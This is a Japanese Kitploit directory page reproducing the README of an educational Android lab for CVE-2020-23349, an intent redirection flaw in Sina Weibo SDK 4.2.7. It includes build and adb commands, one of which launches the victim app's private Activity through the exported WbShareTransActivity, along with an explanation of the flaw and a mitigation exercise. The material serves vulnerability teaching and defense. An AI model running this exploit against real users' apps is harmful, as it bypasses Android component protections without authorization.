Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-23349_Lab — Sina Weibo SDK 4.2.7 の CVE-2020-23349 に関する教育用 Android ラボ | Kitploit
ツール/GitHubGitHub/lazybear8372/cve-2020-23349_lab
Androidセキュリティ脆弱性分析エクスプロイトモバイルアプリペンテストモバイルセキュリティ学習と教育ラボと実践
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

Sina Weibo SDK 4.2.7 の CVE-2020-23349 に関する教育用 Android ラボ

リポジトリを見る
91ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-23349 Android Lab

Sina Weibo Android SDK 4.2.7のIntent Redirection脆弱性をローカルで再現する教育用プロジェクトです。

許可されたテスト端末またはエミュレータでのみ使用してください。実際のユーザーアプリを対象に使用してはいけません。

構成

  • victim: 実際のopenDefault-4.2.7.aarを含む脆弱なアプリ
  • attacker: exported WbShareTransActivityを呼び出す攻撃アプリ
  • victim/.../PrivateActivity: android:exported="false"である再現対象

脆弱なフローは次のとおりです。

root@kitploit:~
Attackerアプリ
  -> exported WbShareTransActivity
  -> Intent ExtraのstartActivity/gotoActivity
  -> victimのPrivateActivity実行

ビルド

Android SDK 36とJDK 17が必要です。

root@kitploit:~
./gradlew clean assembleDebug

生成ファイル:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

インストールと再現

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. 必要に応じてVictimアプリを一度実行します。
  2. AttackerアプリでLaunch private Activityボタンを押します。
  3. EXPLOIT SUCCESS画面が表示されたら再現成功です。

ADBで直接再現することもできます。

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

なぜ機能するのか

SDK 4.2.7は外部IntentのstartActivityとgotoActivity文字列を信頼し、次のような形式で使用します。

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

thisはVictimアプリのContextであるため、AndroidはVictimアプリが自身のprivate Activityを実行しているものとして処理します。

現代のAndroidビルドではandroid:exportedを明示する必要があるため、このプロジェクトは過去のSDKの暗黙的なexported状態を再現するために、victim/AndroidManifest.xmlで明示的にtrueを指定しています。

緩和策の演習

共有機能が必要ない演習では、次の値をfalseに変更して再ビルドします。

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

その後、同じ攻撃を実行するとSecurityExceptionでブロックされます。実際の製品ではWeibo SDK 4.xを削除し、最新のメンテナンス版へアップグレードする必要があります。

SDKの出典

同梱のAARはSina Weibo公式公開リポジトリの4.2.7コミットから取得しました。

  • リポジトリ: https://github.com/sinaweibosdk/weibo_android_sdk
  • コミット: 99daf8a (4.2.7)
  • ファイル: 新文档/openDefault-4.2.7.aar
ツールをダウンロード